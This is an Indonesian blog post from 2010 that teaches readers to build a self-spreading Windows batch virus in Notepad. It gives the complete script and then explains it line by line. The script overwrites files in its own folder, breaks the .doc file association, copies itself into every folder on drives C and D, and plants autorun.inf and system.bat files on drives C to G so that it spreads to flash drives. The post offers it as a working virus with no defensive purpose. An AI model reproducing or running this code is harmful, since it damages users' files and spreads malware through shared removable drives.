bento info: Membuat batch virus dengan Notepad
Blog ini berisi Trik-trik, News dan Software-software yang mungkin berguna bagi semua. | Bagi yang berkenan memberi Donasi untuk Blog ini klik aja link Donate tk's.. =>>|| Donate ||...

Rabu, 17 November 2010

Membuat batch virus dengan Notepad

Pertama kita buka Notepad .Setelah itu Tulislah/Copy Kode Dibawah Ini ke Notepad :


Echo off
For %%v in (*) do copy %0 "%%v" ren * *.Bat
ASSOC.DOc=.Hancur!!
For /R "C:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
For /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
echo off >> autorun.inf
echo [Autorun] >> autorun.inf
echo open=system.bat >> autorun.inf
copy autorun.inf C:\autorun.inf
copy autorun.inf d:\autorun.inf
copy autorun.inf e:\autorun.inf
copy autorun.inf f:\autorun.inf
copy autorun.inf f:\autorun.inf
Copy %0 C:\system.bat
Copy %0 d:\system.bat
Copy %0 e:\system.bat
Copy %0 f:\system.bat
Copy %0 g:\system.bat

lalu Kalian Saveas dalam eksitensi .Bat Maka jadilah Sebuah Virus Yang memiliki Kekuatan Cukup Hebat.




1.Echo off
Membersihkan layar Command Prompt
2.For %%v in (*) do copy %0 "%%v" ren * *.Bat
Membuat Virus Menyerang semua file yang ada didalam folder yang sama dengan virus
3.ASSOC.DOc=.Hancur!!
Menghancurkan Semua File Doc yang ada Di Komputer
4.For /R "C:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
Mengcopykan diri virus ke Semua Folder Yang Ada Di Drive C
5.For /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"
Mengcopykan Diri Virus Ke Semua FOlder Yang Ada Di Drive D
6.echo off >> autorun.inf
echo [Autorun] >> autorun.inf
echo open=system.bat >> autorun.inf
copy autorun.inf C:\autorun.inf
copy autorun.inf d:\autorun.inf
copy autorun.inf e:\autorun.inf
copy autorun.inf f:\autorun.inf
copy autorun.inf g:\autorun.inf
Copy %0 C:\system.bat
Copy %0 d:\system.bat
Copy %0 e:\system.bat
Copy %0 f:\system.bat
Copy %0 g:\system.bat
Membuat Autorun Dan Langsung Mengocpykan Virus dan Autorunnya di drive C d e f g,sehingga virus bisa berjalan secara otomatis dan juga bisa menginfeksi Flashdisk.

sekian. credit by sohai.

0 komentar:

Posting Komentar

Kasih komentar yah ..!!

Share |
bento karya. Diberdayakan oleh Blogger.

Design by bento karya. Group Facebook @Group FB and @Forum Kita